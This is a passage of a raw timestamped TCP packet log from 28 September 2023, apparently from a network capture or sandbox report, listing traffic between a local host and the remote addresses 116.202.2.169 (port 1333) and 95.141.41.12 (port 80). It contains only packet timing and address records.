                                                                                              Sep 28, 2023 06:01:59.522675037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522702932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522716045 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522741079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522748947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522790909 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522814035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522859097 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522913933 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522952080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522959948 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.522989035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.522996902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523034096 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523088932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523133993 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523159981 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523205042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523228884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523274899 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523298979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523336887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523348093 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523380995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523437977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523475885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523482084 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523511887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523519993 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523547888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523555994 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523590088 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523648977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523694992 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523777962 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523830891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523878098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523915052 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.523930073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.523960114 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524014950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524065018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524087906 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524133921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524188042 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524225950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524239063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524269104 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524296045 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524341106 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524363995 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524410963 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524436951 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524483919 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524508953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524545908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524553061 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524590969 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524645090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524697065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524772882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524826050 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524873972 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524913073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524924994 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524950027 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524955988 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.524987936 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.524995089 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525036097 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525088072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525125980 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525134087 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525162935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525168896 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525201082 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525206089 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525242090 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525270939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525316000 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525340080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525384903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525409937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525465012 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525480986 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525520086 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525527000 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525556087 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525562048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525597095 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525655985 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525691986 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525707006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525728941 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525733948 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525768042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525827885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525880098 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.525897026 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.525943995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.526057959 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.526108027 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.531138897 CEST804981395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.531212091 CEST4981380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:59.701674938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.701700926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.701759100 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.701802015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.701837063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.701884031 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.701905966 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.701946020 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702008009 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702048063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702079058 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702119112 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702164888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702213049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702291012 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702337027 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702425003 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702469110 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702488899 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702526093 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702558041 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702596903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702656984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702702999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.702827930 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.702872038 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703154087 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703203917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703237057 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703282118 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703290939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703332901 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703342915 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703385115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703560114 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703608036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703617096 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703660011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703691959 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703737974 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703746080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703790903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703840971 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.703888893 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.703958988 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704008102 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704287052 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704335928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704400063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704442978 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704498053 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704540014 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704560041 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704598904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704622984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704659939 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704690933 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704727888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704773903 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704811096 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704829931 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704866886 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704881907 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704917908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.704937935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.704972982 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705003977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705025911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705039978 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705060005 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705096960 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705133915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705149889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705184937 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705190897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705224991 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705231905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705267906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705310106 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705347061 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705368042 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705404997 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705492020 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705534935 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705619097 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705666065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705670118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705713987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705724001 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705764055 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705796003 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705837011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705888033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705938101 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.705956936 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.705996037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706005096 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706042051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706060886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706099033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706130028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706165075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706216097 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706228971 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706250906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706269979 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706283092 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706322908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706346035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706361055 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706383944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706403017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706427097 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706463099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706480980 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706515074 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706531048 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706568956 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706605911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706635952 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706645966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706671953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706701040 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706737995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706770897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706809998 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706840992 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706871033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706880093 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706912041 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.706965923 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.706979990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707004070 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707011938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707031965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707056999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707056999 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707094908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707101107 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707140923 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707173109 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707209110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707211018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707246065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707278013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707315922 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707319021 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707360983 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707393885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707438946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707500935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707542896 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707581043 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707618952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707637072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707674980 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707705975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707745075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707765102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707803965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707834959 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707875967 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707895994 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.707931995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.707978964 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708017111 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708022118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708056927 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708108902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708158016 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708174944 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708210945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708230019 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708266020 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708301067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708339930 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708359957 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708398104 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708431005 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708471060 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708482981 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708519936 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708586931 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708626032 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708647966 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708674908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708687067 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708712101 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708730936 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708767891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708801031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708841085 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708873034 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708919048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.708929062 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.708971977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709006071 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709031105 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709049940 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709069014 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709105015 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709140062 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709146976 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709182024 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709187984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709228039 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709244013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709285021 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709304094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709346056 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709371090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709386110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.709414959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709429026 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.709454060 CEST133349810116.202.2.169192.168.2.3
